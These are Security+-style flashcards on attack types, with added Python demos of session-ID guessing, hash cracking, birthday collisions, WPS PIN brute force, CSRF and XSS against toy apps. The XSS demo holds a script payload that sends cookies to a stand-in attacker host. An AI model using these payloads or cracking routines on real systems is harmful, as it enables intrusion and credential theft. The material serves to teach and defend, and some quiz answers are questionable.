1.2 Compare and contrast types of attacks Flashcards
An attacker came within close proximity of a victim and sent the mobile device user an unsolicited text message. Once the user clicked the link in the message, the user's device was infected with Trojan malware. What type of attack did the attacker most likely use against the mobile user?
Bluejacking
A social engineer intercepted an end-user's phone call to an internet service provider (ISP) about a home internet outage. Pretending to be the caller who reported the outage, the attacker immediately contacted the ISP to cancel the service call, dressed up as an internet technician, and then entered the end-user's home with permission. What type of social engineering attack did the ISP and end-user fall victim to?
Impersonation
If an attacker registers a fake domain whose name closely resembles a real company's domain, and then uses the fake domain to send forged notices by email that appear to come from the legitimate company, which of the following attacks did the malicious user perform?
Typosquatting
A penetration tester cracked a company’s Wired Equivalent Privacy (WEP) access point (AP) by making the AP generate a large amount of initialization vector (IV) packets, by replaying Address Resolution Protocol (ARP) packets at it. What type of attack did the pen tester use to crack the AP?
Replay
A user entered credentials into a web application login page. Unfortunately, the login form contained a malicious invisible iframe that allowed the attacker to intercept the user's input. What type of attack is this known as?
Clickjacking
Which of the following attacks do security professionals expose themselves to, if they do not salt passwords with a random value?
Rainbow table attacks
A social engineer used a phishing attack to trick users into visiting a website. Once users visit the site, an exploit kit hosted there actively exploits vulnerabilities in the client's browser and plug-ins. What type of attack did the users become a victim of?
A Man-in-the-Browser (MitB) attack
A group of college students receive a phone call from someone claiming to be from a debt consolidation firm. The caller tried to convince the students that a rare, limited-time offer that could erase their student loan debt was about to expire, but only if they provided their Social Security Number and other personally identifiable information (PII). Which of the following tactics did the caller use?
Scarcity and urgency
URL hijacking (also called typosquatting)
relies on users navigating to misspelled domains. An attacker registers a domain name with a common misspelling of an existing domain, so users who mistype the URL in the web browser land on the attacker's website
Domain hijacking
where the attacker steals a domain name by altering its registration information and then transferring the domain name to another entity. Sometimes referred to as brandjacking
Kiting
act of continually registering, deleting, and reregistering a name within the five-day grace period without having to pay for it
Tasting
Domain Name System (DNS) registration abuse that involves registering a domain temporarily to see how many hits it generates within the five-day grace period, then dropping it before paying
Replay
- attacker intercepts authentication data and reuses it to re-establish a session. Cracking WEP uses a type of replay attack: captured ARP packets are replayed at the AP to make it generate a large number of IV packets
- consists of intercepting a key or password hash then reusing it to gain access to a resource, such as the pass-the-hash attack
War driving
practice of using a Wi-Fi sniffer to detect WLANs and then either making use of them or trying to break into them (using WEP and WPA cracking tools)
Wi-Fi jamming
attack can be performed by setting up an AP with a stronger signal. Wi-Fi jamming devices are illegal to use and to sell. The attacker needs to gain fairly close physical proximity to the wireless network
Skimming
RFID attack where an attacker uses a fraudulent RFID reader to read the signals from a contactless bank card
Clickjacking
hijacking attack that forces a user to unintentionally click a link that is embedded in or hidden by other web page elements
MitB
where the web browser is compromised by installing malicious plug-ins or scripts or intercepting API calls. Vulnerability exploit kits can be installed to a website and actively try to exploit vulnerabilities in clients browsing the site
XSRF
malicious script hosted on the attacker’s site that can exploit a session started on another site in the same browser
Session IDs
generated using patterns (such as IP address with the date and time), making the session vulnerable to eavesdropping and possibly hijacking, by replaying the cookie to re-establish the session
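Added example (not from the original flashcards): a session ID derived from the client IP and login time, as the card above describes, can be enumerated by an attacker who never eavesdropped on the cookie at all. The `SessionStore`, the timestamp, the IP addresses and the user names are constructed for the demonstration; the contrast is with an ID drawn from the OS CSPRNG, which has no pattern to exploit.

```python
import hashlib
import secrets


def weak_session_id(client_ip: str, issued_at: int) -> str:
    """Constructed weak scheme: the ID is just a hash of the client IP
    and the login time in whole seconds, so it is fully predictable."""
    return hashlib.sha256(f"{client_ip}|{issued_at}".encode()).hexdigest()


def strong_session_id() -> str:
    """256 bits from the OS CSPRNG; nothing about the user or the clock feeds in."""
    return secrets.token_urlsafe(32)


class SessionStore:
    """Minimal server-side session table (constructed for the example)."""

    def __init__(self):
        self._sessions = {}

    def create(self, user: str, sid: str) -> str:
        self._sessions[sid] = user
        return sid

    def user_for(self, sid: str):
        return self._sessions.get(sid)


def hijack_predictable_session(store, victim_ip, approx_login_time, window=300):
    """Attacker knows the victim's IP and roughly when they logged in.
    Enumerate every candidate ID in a +/- window and present each to the
    server until one is accepted. Returns (user, session_id, attempts)."""
    attempts = 0
    for delta in range(-window, window + 1):
        attempts += 1
        candidate = weak_session_id(victim_ip, approx_login_time + delta)
        user = store.user_for(candidate)
        if user is not None:
            return user, candidate, attempts
    return None, None, attempts


def demo_weak():
    store = SessionStore()
    login_time = 1_700_000_000  # constructed timestamp
    store.create("alice", weak_session_id("203.0.113.7", login_time))
    # attacker's estimate is two minutes off; a five-minute window still covers it
    return hijack_predictable_session(store, "203.0.113.7", login_time + 120)


def demo_strong():
    store = SessionStore()
    store.create("bob", strong_session_id())
    # same attack against a random ID: no candidate matches
    return hijack_predictable_session(store, "203.0.113.7", 1_700_000_000)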
Salt
Password hashes not "salted" with a random per-user value are vulnerable to rainbow table attacks. A rainbow table attack is a type of password attack where an attacker uses a precomputed table of plaintext passwords and their hashes to recover passwords from stolen hashes; a salt forces the attacker to recompute the table for every user
dictionary attack
software enumerates values in a dictionary wordlist. Enforcing password complexity makes passwords difficult to guess and compromise. Varying the characters in the password makes it more resistant to these attacks
brute force attack
attempts every possible combination in the key space, to derive a plaintext password from a hash
hybrid password attack
targeted against naively strong passwords. The password cracking algorithm tests dictionary words and names in combination with numeric prefixes and/or suffixes
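Added example (not part of the original flashcards) covering the salt, rainbow table, dictionary and hybrid cards above in one run: a hybrid candidate generator (dictionary words with case variants and numeric prefixes/suffixes) feeds a precomputed hash-to-plaintext table, which instantly recovers an unsalted hash but finds nothing for the same password once a random salt is mixed in. The wordlist, the victim password and the plain SHA-256 construction are assumptions made for the demonstration; a production scheme would use a slow, salted KDF such as scrypt or Argon2.

```python
import hashlib
import secrets

# Constructed wordlist standing in for a dictionary file.
WORDLIST = ["password", "letmein", "summer", "welcome", "dragon"]


def hybrid_candidates(words, max_number=99):
    """Hybrid attack: each dictionary word and its capitalised form,
    bare and with numeric prefixes and suffixes 0..max_number."""
    for word in words:
        for variant in (word, word.capitalize()):
            yield variant
            for n in range(max_number + 1):
                yield f"{variant}{n}"
                yield f"{n}{variant}"


def unsalted_hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password: str, salt: bytes) -> str:
    # The salt is stored next to the hash; it is not secret, only unique.
    return hashlib.sha256(salt + password.encode()).hexdigest()


def build_table(candidates):
    """Precomputed lookup table (the idea behind a rainbow table): hash -> plaintext."""
    return {unsalted_hash(c): c for c in candidates}


def lookup(table, digest):
    return table.get(digest)


def crack_salted(target_digest, salt, candidates):
    """With a per-user salt the precomputed table is useless; the attacker
    must hash every candidate again for this one salt."""
    for c in candidates:
        if salted_hash(c, salt) == target_digest:
            return c
    return None


def demo():
    table = build_table(hybrid_candidates(WORDLIST))
    victim_password = "Summer42"  # constructed "naively strong" password

    # Unsalted: one dictionary lookup recovers it.
    found_unsalted = lookup(table, unsalted_hash(victim_password))

    # Salted: the same table does not contain the salted digest ...
    salt = secrets.token_bytes(16)
    salted = salted_hash(victim_password, salt)
    found_in_table = lookup(table, salted)

    # ... and the attacker has to redo the whole candidate run per user.
    cracked = crack_salted(salted, salt, hybrid_candidates(WORDLIST))
    return found_unsalted, found_in_table, cracked, len(table)
```

The table is tiny here (about two thousand entries); the point is that its cost is paid once and reused against every unsalted hash ever captured, whereas the salted search in `crack_salted` has to be repeated for each user.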
bluejacking
Bluetooth-discoverable device is vulnerable to bluejacking, similar to spam, where someone sends an unsolicited text (or picture/video) message or vCard (contact details). This can also be a vector for Trojan malware
Bluesnarfing
refers to using an exploit in Bluetooth to steal information from someone else’s phone. The exploit (now patched) allows attackers to circumvent the authentication mechanism
rogue AP
a rogue AP that masquerades as a legitimate one is called an evil twin, or sometimes wiphishing
HTTP Response Splitting
where the attacker crafts a malicious URL containing carriage-return/line-feed (CRLF) sequences and convinces the victim to submit it to the web server; if the server copies the value into a response header unchecked, the attacker can inject extra headers or a second response
LSOs or Flash cookies
data that is stored on a user’s computer by websites that use Adobe Flash Player. A site may be able to track a user’s browsing behavior through LSOs
Using social engineering, an attacker called an employee to extract the name and contact information of the Chief Information Security Officer (CISO). What social engineering deception did the attacker utilize?
Vishing
A social engineer, impersonating a suppliant, rummaged through the garbage of a high-ranking loan officer, hoping to find discarded documents and removable media containing personally identifiable information (PII). Which of the following social engineering techniques did the attacker utilize?
Dumpster diving
Which of the following is an example of why viruses are destructive?
- Viruses can exploit zero days
- Viruses can spread via social engineering techniques.
A malicious user sniffed credentials exchanged between two computers by intercepting communications between them. What type of attack did the attacker execute?
A Man-in-the-Middle attack
Mutual authentication prevents a client from inadvertently submitting confidential information to a non-secure server. Mutual authentication also helps avoid which of the following? (Select two)
- Man-in-the-Middle attacks
- Session hijacking attacks
An attacker remotely compromised a closed-circuit television (CCTV) server and used it to steal a user’s password. Which of the following can help prevent this type of shoulder surfing?
A privacy filter
What type of attack can facilitate a Man-in-the-Middle attack by requesting that the server use a lower specification protocol with weaker ciphers and key lengths?
A downgrade attack
Worms
- spread through memory and network connections rather than by infecting files
- are memory-resident viruses that replicate themselves over network resources
Mutual authentication
- security mechanism that requires each party in a communication to verify the other's identity
- helps in avoiding Man-in-the-Middle attacks and session hijacking attacks
Address Resolution Protocol (ARP) poisoning
occurs when an attacker with access to the local network sends forged ARP replies so that hosts map an IP address to the attacker's MAC address, redirecting traffic for that IP to a computer that is not the intended recipient
IP spoofing
occurs when an attacker sends IP packets from a false (or spoofed) source address to communicate with targets
colocation
data center that contains racks with networking equipment owned by different companies
access list
held at each secure gateway records who is allowed to enter. An electronic lock may be able to log access attempts or a security guard can manually log movement
downgrade attack
used to facilitate a Man-in-the-Middle attack by requesting that the server use a lower specification protocol with weaker ciphers and key lengths
birthday attack
type of brute force attack aimed at exploiting collisions in hash functions; because a collision in an n-bit hash can be found in roughly 2^(n/2) trials rather than 2^n, this type of attack can be used for the purpose of forging a digital signature
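Added example, not from the original flashcards: a birthday search against a deliberately truncated SHA-256 (32 bits, chosen so it finishes in well under a second), alongside the birthday-bound formula that says why about 2^(n/2) trials suffice. The "signature" is a toy that just returns the truncated hash, standing in for any real scheme that signs the hash of a message; the two colliding messages then verify under the same signature, which is the forgery the card refers to.

```python
import hashlib
import math


def truncated_hash(data: bytes, nbits: int) -> int:
    """First nbits of SHA-256, simulating a short hash whose collisions are cheap."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - nbits)


def find_collision(nbits: int, prefix: bytes = b"contract-v"):
    """Birthday search: hash distinct messages until two share a digest.
    Returns (message_a, message_b, trials)."""
    seen = {}
    counter = 0
    while True:
        msg = prefix + counter.to_bytes(4, "big")
        h = truncated_hash(msg, nbits)
        if h in seen:
            return seen[h], msg, counter + 1
        seen[h] = msg
        counter += 1


def collision_probability(trials: int, nbits: int) -> float:
    """Birthday-bound approximation: P(collision) ~ 1 - exp(-k(k-1) / 2N)."""
    n = 2 ** nbits
    return 1.0 - math.exp(-trials * (trials - 1) / (2.0 * n))


def expected_work(nbits: int) -> dict:
    """Collision search costs about 2^(n/2) hashes; a preimage search about 2^n."""
    return {"collision": 2 ** (nbits / 2), "preimage": 2 ** nbits}


def toy_sign(msg: bytes, nbits: int) -> int:
    # Stand-in for "the signer signs the hash of the message".
    return truncated_hash(msg, nbits)


def toy_verify(sig: int, msg: bytes, nbits: int) -> bool:
    return sig == truncated_hash(msg, nbits)


def demo(nbits: int = 32):
    a, b, trials = find_collision(nbits)
    sig = toy_sign(a, nbits)          # victim signs message a ...
    forged = toy_verify(sig, b, nbits)  # ... and the signature verifies over b
    return trials, forged, expected_work(nbits)
```

With 32 bits the search typically needs on the order of 80,000 hashes, against about 4 billion for a preimage; the same ratio is why a 128-bit hash gives only 64 bits of collision resistance.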
Man-in-the-Middle attack
form of eavesdropping where the attacker makes an independent connection between two victims and steals information to use fraudulently
An attacker exploited a vulnerability on a website frequently visited by a group of bank employees. Once the employees visit the site, the attacker’s malware infects their computers. What type of attack did the employees fall for?
A watering hole attack
If a hacker compromised multiple computers with Trojan malware to create a botnet, what type of attack can the hacker launch?
Distributed Denial of Service (DDoS)
If a social engineer dresses up as an internet technician, and then proceeds to enter a place of business once granted permission, what type of social engineering attack does this describe?
Impersonation
If an attacker performs open source intelligence (OSINT) gathering and social engineering on the CEO and creates an email scam for the upper management department of a company, what type of attack occurs?
Whaling
To automate and simplify the setup process of adding a wireless network, a homeowner installed a wireless access point capable of Wi-Fi Protected Setup (WPS) with an eight-digit Personal Identification Number (PIN). What type of attack can a hacker perform to exploit this vulnerability?
A brute force attack (the AP verifies the PIN in two halves and the last digit is a checksum, so only about 11,000 guesses are needed instead of 100 million)
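Added example (not from the original flashcards) of why the WPS PIN brute force is practical: the checksum digit computation that real WPS PINs satisfy, the resulting search-space sizes, and a split-half search against a constructed oracle that answers like an AP which reveals whether the first four digits were correct before checking the rest. The oracle, the `12345670` target PIN and the attempt counting are assumptions for the demonstration; against a real AP the same logic drives tools that speak the WPS registration protocol.

```python
def wps_checksum(first7: str) -> int:
    """Eighth digit of a WPS PIN: weighted digit sum of the first seven, mod 10."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("expected seven digits")
    d = [int(c) for c in first7]
    acc = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(pin[:7]) == int(pin[7])


def search_space(split_verification: bool, checksum_known: bool) -> int:
    """Number of guesses in the worst case for each protocol weakness combination."""
    if split_verification:
        return 10 ** 4 + (10 ** 3 if checksum_known else 10 ** 4)
    return 10 ** 7 if checksum_known else 10 ** 8


def make_oracle(real_pin: str):
    """Constructed stand-in for the AP: reports whether the first half matched,
    and whether the whole PIN matched, which is the information leak the attack uses."""
    def oracle(pin: str):
        first_ok = pin[:4] == real_pin[:4]
        whole_ok = first_ok and pin[4:] == real_pin[4:]
        return first_ok, whole_ok
    return oracle


def brute_force_split(oracle):
    """Recover the PIN in at most 10,000 + 1,000 attempts. Returns (pin, attempts)."""
    attempts = 0
    first = None
    for a in range(10 ** 4):
        attempts += 1
        candidate = f"{a:04d}"
        first_ok, _ = oracle(candidate + "0000")  # second half is filler here
        if first_ok:
            first = candidate
            break
    if first is None:
        return None, attempts
    for b in range(10 ** 3):
        attempts += 1
        body = first + f"{b:03d}"
        pin = body + str(wps_checksum(body))  # only checksum-valid PINs are tried
        _, whole_ok = oracle(pin)
        if whole_ok:
            return pin, attempts
    return None, attempts


def demo():
    return brute_force_split(make_oracle("12345670"))
```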
An attacker modified the HTML code of a legitimate password-change webform, then hosted the .html file on the attacker’s web server. The attacker then emailed a URL link of the hosted file to a real user of the webpage. Once the user clicked the link, it changed the user’s password to a value the attacker set. Based on this information, what type of attack is the website vulnerable to?
Cross-site Request Forgery (XSRF)
watering hole attack
directed social engineering attack. It relies on the circumstance that a group of targets may use an unsecure third party website
hoax attack
email alert or web pop-up will claim to have identified some sort of security problem, like a virus infection, and offer a tool to fix the problem, but the tool will be some sort of Trojan application
Pharming
relies on corrupting the way the victim’s computer performs Internet name resolution, so that they are redirected from the genuine site to the malicious one
Cross-site Request Forgery (XSRF)
malicious script hosted on the attacker’s site that can exploit a session started on another site in the same browser. This is successful if the server does not check if the user actually made the request
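Added example, not part of the original flashcards, modelling the password-change scenario in the XSRF question above: a request handler that trusts the session cookie alone accepts a forged cross-site form post, while the same handler that also demands a per-session token the attacker's page cannot read rejects it. The `PasswordChangeApp`, `Request` shape, user names and origins are constructed for the example; the browser's behaviour of attaching the victim's cookie to a form submitted from another site is what the forged request simulates.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    origin: str = ""  # Origin header browsers add to cross-site POSTs


class PasswordChangeApp:
    """Constructed minimal web app with one state-changing endpoint."""

    def __init__(self, require_token: bool):
        self.require_token = require_token
        self.sessions = {}   # session id -> {"user": ..., "csrf": ...}
        self.passwords = {}  # user -> current password

    def login(self, user: str, password: str) -> str:
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
        self.passwords[user] = password
        return sid

    def form_token(self, sid: str) -> str:
        """Token the legitimate form embeds as a hidden field; tied to the session."""
        return self.sessions[sid]["csrf"]

    def change_password(self, req: Request) -> int:
        session = self.sessions.get(req.cookies.get("session"))
        if session is None:
            return 401
        if self.require_token:
            supplied = req.form.get("csrf_token", "")
            # constant-time compare; the server checks the user really made the request
            if not hmac.compare_digest(supplied, session["csrf"]):
                return 403
        self.passwords[session["user"]] = req.form["new_password"]
        return 200


def forged_request(victim_sid: str) -> Request:
    """Attacker's page auto-submits a form to the real site. The browser attaches
    the victim's cookie, but the attacker cannot read the token from the real form."""
    return Request(cookies={"session": victim_sid},
                   form={"new_password": "attacker-chosen"},
                   origin="https://evil.example")


def legitimate_request(app: PasswordChangeApp, sid: str) -> Request:
    return Request(cookies={"session": sid},
                   form={"new_password": "user-chosen", "csrf_token": app.form_token(sid)},
                   origin="https://bank.example")


def demo(require_token: bool):
    """Returns (status of forged request, status of legitimate request, final password)."""
    app = PasswordChangeApp(require_token)
    sid = app.login("alice", "original")
    forged = app.change_password(forged_request(sid))
    after_forgery = app.passwords["alice"]
    legit = app.change_password(legitimate_request(app, sid))
    return forged, legit, after_forgery, app.passwords["alice"]
```

A `SameSite` cookie attribute or an `Origin`/`Referer` check adds defence in depth, but the synchronizer token is the check the card describes: it lets the server confirm that the user, not another site, built the request.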
Reflected Cross-Site Scripting (XSS)
server-side input validation flaw in which a script carried in the request (typically a crafted URL the victim is tricked into following) is echoed back unescaped in the response. Once the victim opens the link, the malicious code executes in the user's browser
Stored (or persistent) Cross-Site Scripting (XSS)
server-side script attack that inserts code into a back-end database used by the trusted site
Document Object Model (DOM) Cross-Site Scripting (XSS)
exploits vulnerabilities in client-side scripts to modify the content and layout of a web page
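Added example (not from the original flashcards) contrasting the reflected and stored XSS cards above in one constructed guestbook app: a search page that echoes its query (reflected) and a comments page rendered from a back-end store (stored), each shown with output escaping switched off and on. The app, the payload and the `contains_script` check are assumptions for the demonstration; DOM-based XSS is not covered here because its sink is in client-side script, where server-side escaping does not reach.

```python
from html import escape


class GuestbookApp:
    """Constructed minimal app with one reflected and one stored output path."""

    def __init__(self, escape_output: bool):
        self.escape_output = escape_output
        self.comments = []  # back-end store that every visitor's page is built from

    def _render(self, text: str) -> str:
        # Hardened path: contextual output encoding for HTML text and attributes.
        return escape(text, quote=True) if self.escape_output else text

    def search_page(self, query: str) -> str:
        """Reflected: the query parameter is echoed straight into the page."""
        return f"<h1>Results for: {self._render(query)}</h1>"

    def post_comment(self, author: str, body: str) -> None:
        self.comments.append((author, body))

    def comments_page(self) -> str:
        """Stored: whatever was saved is rendered for every later visitor."""
        items = "".join(
            f"<li><b>{self._render(author)}</b>: {self._render(body)}</li>"
            for author, body in self.comments
        )
        return f"<ul>{items}</ul>"


def contains_script(html: str) -> bool:
    """Crude check used only to show whether a <script> tag survived into the page."""
    return "<script" in html.lower()


# Constructed payload: exfiltrates the document cookie to an attacker-controlled host.
PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def demo(escape_output: bool):
    """Returns (reflected page contains script, stored page contains script)."""
    app = GuestbookApp(escape_output)
    reflected = app.search_page(PAYLOAD)
    app.post_comment("mallory", PAYLOAD)
    stored = app.comments_page()
    return contains_script(reflected), contains_script(stored)
```

The stored case is the more dangerous one: the attacker submits the payload once and every subsequent visitor runs it, with no phishing link required.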
An attacker gathered Open Source Intelligence (OSINT) about a company through the internet, then contacted employees of the company and used the information gathered to extract more personally identifiable information (PII). Which of the following describes this type of social engineering attack?
Trust